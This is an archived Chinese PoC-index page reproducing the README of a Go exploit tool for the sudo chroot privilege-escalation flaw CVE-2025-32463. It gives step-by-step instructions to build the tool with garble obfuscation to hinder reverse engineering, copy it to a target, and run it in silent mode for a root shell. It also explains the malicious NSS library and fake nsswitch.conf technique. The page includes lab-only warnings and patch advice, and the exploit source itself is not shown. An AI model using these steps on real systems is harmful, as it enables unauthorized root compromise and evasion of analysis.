关联漏洞
标题:
Sudo 安全漏洞
(CVE-2025-32463)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
描述
This CVE addresses a vulnerability in sudo versions 1.9.14 to 1.9.17, enabling unauthorized local privilege escalation to root access.
介绍
## CVE-2025-32463 Exploit Tool
This repository contains a Go-based exploit tool for **CVE-2025-32463**, a critical privilege escalation vulnerability (CVSS 9.3) in sudo versions **1.9.14 to 1.9.17**.
The tool allows local users to gain root access by exploiting a flaw in the `--chroot (-R)` option of sudo.
This tool is intended for **educational and testing purposes only in controlled, isolated environments**.
> **Warning**: Use this tool only in environments where you have **explicit permission** to test (e.g., virtual machines or lab setups). Unauthorized use on systems you do not own is **illegal and unethical**. Always take **snapshots** of your testing environment and **update sudo after testing**.
---
### Prerequisites
To use this tool, ensure the following are installed on your system:
- **Go**: Version 1.2 or higher
`sudo apt install golang`
- **gcc**: For compiling the malicious C library
`sudo apt install gcc`
- **libc-dev**: For C library headers
`sudo apt install libc-dev`
- **sudo**: Version between 1.9.14 and 1.9.17
- **User Permissions**: A non-privileged user with sudo access and `--chroot (-R)` allowed
- **No Security Restrictions**: SELinux/AppArmor must not block shared library loading
---
## Setup Instructions
Follow these steps to clone, compile, obfuscate, and deploy the tool securely.
### 1. Clone the Repository
```bash
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
```
---
### 2. Secure Compilation
To make reverse engineering difficult, we recommend compiling the binary with obfuscation using `garble` or optimizing Go build flags.
#### Option : Basic Compilation
```bash
go build -o exploit
```
#### Option : Obfuscated Compilation with Garble
```bash
go install mvdan.cc/garble@latest
garble -tiny -literals -seed=random build -o exploit
```
- `-tiny`: Minimizes debug information.
- `-literals`: Obfuscates string literals.
- `-seed=random`: Randomizes obfuscation for uniqueness.
#### Option : Optimized Go Build
```bash
go build -ldflags="-s -w" -o exploit
```
- `-s`: Strips symbol table.
- `-w`: Strips DWARF debugging info.
---
### 3. Deploy to Target System
#### Create a Test User (on the target system)
```bash
sudo adduser --home /home/testuser --shell /bin/bash testuser
sudo usermod -aG sudo testuser
```
> Ensure `--chroot (-R)` is not restricted in `/etc/sudoers`.
#### Transfer the Binary
```bash
scp exploit testuser@target:/home/testuser/exploit
```
#### Install Dependencies on Target
```bash
sudo apt update
sudo apt install gcc libc-dev
```
---
### 4. Run the Exploit
Run the binary as the non-privileged user on the target system. Available flags:
- `--help`: Show detailed usage instructions.
- `--about`: Display CVE details.
- `--execution`: Execute the exploit.
- `--silent`: Run silently without logo or process output (requires `--execution`).
#### Examples
**Show Help:**
```bash
./exploit --help
```
**Show CVE Details:**
```bash
./exploit --about
```
**Run Exploit (Normal Mode):**
```bash
./exploit --execution
```
Followed by a **root shell (`#` prompt)**.
**Run Exploit (Silent Mode):**
```bash
./exploit --execution --silent
```
> Output: None (except the root shell if successful)
---
### 5. Verify Success
In the root shell, check for root access:
```bash
id
whoami
```
**Expected Output:**
```
uid=0(root) gid=0(root) groups=0(root),1001(testuser)
root
```
---
## How It Works
The tool exploits CVE-2025-32463 by:
1. Creating a temporary directory `/tmp/sudowoot.stage.*`.
2. Generating a malicious C library `woot1337.c` that sets `uid=0`, `gid=0`, and executes `/bin/bash`.
3. Setting up a fake chroot environment with `nsswitch.conf` and `/etc/group`.
4. Compiling the C code into a shared library `libnss_/woot1337.so.2`.
5. Running `sudo -R woot woot` to load the malicious library and gain a root shell.
6. Cleaning up temporary files automatically.
> Requires: Vulnerable sudo version (1.9.14 - 1.9.17), gcc, libc-dev, and sudo -R permissions.
---
## Safety Precautions
- **Isolated Environment**: Run only in a VM or Docker container (e.g., clone PoC image from `pr0v3rbs/CVE-2025-32463_chwoot`).
- **Snapshot**: Take a VM snapshot before testing to revert changes.
- **Update After Testing**:
```bash
sudo apt update
sudo apt install sudo
```
- **Disable Chroot** (if update not possible):
```bash
echo "Defaults !use_chroot" | sudo tee -a /etc/sudoers
```
---
## References
- [NVD - CVE-2025-32463](https://nvd.nist.gov/vuln/detail/CVE-2025-32463)
- [github.com/kh4sh3i](https://github.com/kh4sh3i/CVE-2025-32463)
文件快照
[4.0K] /data/pocs/8a53135f7e4e6a8726f892632e3e4290aa759ede
├── [ 30] go.mod
├── [ 0] go.sum
├── [1.0K] LICENSE
├── [3.3K] main.go
├── [4.6K] README.md
└── [4.0K] src
└── [3.3K] cve.go
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。